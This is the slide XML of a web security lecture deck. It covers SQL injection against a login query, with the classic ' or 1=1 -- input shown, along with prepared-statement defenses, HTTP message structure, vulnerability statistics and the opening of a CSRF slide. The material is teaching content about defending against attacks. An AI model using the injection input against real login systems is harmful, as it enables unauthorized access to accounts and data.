            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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4386263" y="4076879"/>
            <a:ext cx="302577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 rot="10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="3059111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260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Injection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11500" y="2463800"/>
            <a:ext cx="1274763" cy="24066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b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server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2463800"/>
            <a:ext cx="1395413" cy="24066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b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412037" y="2463800"/>
            <a:ext cx="1274763" cy="24066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200" b="1"/>
              <a:t>DB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833563" y="3643312"/>
            <a:ext cx="1298575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1866900" y="4652962"/>
            <a:ext cx="11811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812925" y="2438400"/>
            <a:ext cx="1341438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/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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386263" y="2532062"/>
            <a:ext cx="3025774" cy="15286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b="1" dirty="0"/>
              <a:t>SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'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4386263" y="4076879"/>
            <a:ext cx="302577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 rot="10800000">
            <a:off x="4386264" y="4435474"/>
            <a:ext cx="3059111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38907" y="5562600"/>
            <a:ext cx="5266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What if user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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'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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or 1=1 --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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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8560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Injection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4600"/>
            <a:ext cx="8229600" cy="2533135"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5067678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SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the Wild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409950"/>
            <a:ext cx="6096000" cy="25527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24000"/>
            <a:ext cx="3175000" cy="2171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28" y="2286000"/>
            <a:ext cx="3598672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32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Defenses Against SQL Injection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76800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared Statements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>custname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>customerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>// perform input validation to detect attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>String query = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>account_balance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> = ? ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>connection.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>( query );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>( 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>custname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" charset="0"/>
                <a:ea typeface="Lucida Sans Typewriter" charset="0"/>
                <a:cs typeface="Lucida Sans Typewriter" charset="0"/>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Input Validation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Case statements, cast to non-string type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Escape User-supplied inputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="American Typewriter" charset="0"/>
                <a:cs typeface="American Typewriter" charset="0"/>
              </a:rPr>
              <a:t>Not recommended</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="757158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4715F-6712-8444-A4EF-2DCEBFFF0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Layer HTTP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AB77E-20D7-4540-B262-039E1CDAC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 Request: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HTTP Response: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71717-DD65-C642-9F12-3C6D75A48A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781102"/>
            <a:ext cx="7345680" cy="31530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79D50C-A56E-7747-98C4-A10FDC6035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98668"/>
            <a:ext cx="7345680" cy="122428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B3FF79E2-A6CA-D24A-8B23-53887B76A10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2076220" y="1600200"/>
            <a:ext cx="5612138" cy="1298643"/>
            <a:chOff x="2076220" y="1600200"/>
            <a:chExt cx="5612138" cy="129864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20F0B27-372A-BA4E-8DD7-F9C371295C4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2076220" y="1600200"/>
              <a:ext cx="5612138" cy="767800"/>
              <a:chOff x="2076220" y="1600200"/>
              <a:chExt cx="5612138" cy="767800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F035D95-02B4-264A-9A48-2E808A5EC2D5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2895600" y="1600200"/>
                <a:ext cx="1877437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Request Method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3B2B907-3F11-0E45-BC12-0B580FD625B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4940676" y="1600200"/>
                <a:ext cx="659155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Path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2FF110D-9268-8C43-BA1E-FD90E2B9526F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5823680" y="1600200"/>
                <a:ext cx="1864678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Protocol Version</a:t>
                </a:r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08E06986-6F8D-7248-8188-1F45EDAB3AB4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2076220" y="1969532"/>
                <a:ext cx="1758099" cy="36040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2F16454C-D48A-CE47-9170-20D0D8B2F765}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="9" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2350540" y="1969532"/>
                <a:ext cx="2919714" cy="39846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92B0CC5E-F13B-F545-A2A4-07AB1F5A9C27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="10" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="3415221" y="1969532"/>
                <a:ext cx="3340798" cy="36040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C221039-3239-B84A-A97C-A06CCF74BF7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6441122" y="2514600"/>
              <a:ext cx="1102678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Headers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A800318-CE0F-964D-82AD-8E50C18BC21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37760" y="2621280"/>
              <a:ext cx="1510042" cy="8639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CF169A17-C437-2F41-ACDF-EFE1772C6F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38600" y="2736810"/>
              <a:ext cx="2402522" cy="16203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C93E027-0044-9B40-93F8-DC6951AAA27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5486400" y="4038600"/>
            <a:ext cx="2667000" cy="2514600"/>
            <a:chOff x="5486400" y="4038600"/>
            <a:chExt cx="2667000" cy="2514600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Right Brace 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24B4C471-3054-D446-9807-E53AB7E4AFBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6756019" y="4038600"/>
              <a:ext cx="236442" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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4753F17-D44D-AA4C-AC5A-64715AB7A267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7050722" y="4882634"/>
              <a:ext cx="1102678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Header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ADC322E-6DA6-A547-8243-E3D83725A442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7050722" y="5942585"/>
              <a:ext cx="721678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Body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E099747-687C-0D4F-98B8-5E94E1E860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86400" y="6164795"/>
              <a:ext cx="1564322" cy="38840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063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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39A9F3EC-7CA3-4247-B8FB-3EA932F868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8229600" cy="5105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Vulnerabilities by Year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066800" y="1795780"/>
            <a:ext cx="1508760" cy="1402080"/>
            <a:chOff x="838200" y="2895600"/>
            <a:chExt cx="1508760" cy="1402080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="2895600"/>
              <a:ext cx="1508760" cy="1402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892627" y="2917371"/>
              <a:ext cx="1393373" cy="1349829"/>
              <a:chOff x="892627" y="2917371"/>
              <a:chExt cx="1393373" cy="1349829"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill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5" t="8917" r="79801" b="71491"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="2917371"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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504" t="8917" r="60332" b="71491"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="3143794"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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487" t="8666" r="25329" b="71742"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892629" y="3370217"/>
                <a:ext cx="1164771" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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586" t="8572" r="7250" b="71836"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892628" y="3596640"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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8" t="62418" r="79858" b="17990"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892627" y="3823063"/>
                <a:ext cx="1393371" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/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443" t="62544" r="25373" b="17864"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="892627" y="4040777"/>
                <a:ext cx="1164773" cy="226423"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="629160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Vulnerability Occurrence in Applications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A31DA69-BC43-A741-87BE-A05CA4A7EB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2851084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1752600"/>
          <a:ext cx="8915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8827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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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787" y="3103563"/>
            <a:ext cx="1436688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CompaqAlphaServerES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1725" y="2084388"/>
            <a:ext cx="1155700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S15serverfro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4187" y="5402263"/>
            <a:ext cx="243681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943600" y="5021263"/>
            <a:ext cx="16938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solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack Server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784850" y="1657350"/>
            <a:ext cx="1760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solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2657475" y="2486025"/>
            <a:ext cx="2830512" cy="61753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11187" y="4476750"/>
            <a:ext cx="1465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solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2994025" y="2298700"/>
            <a:ext cx="2068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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
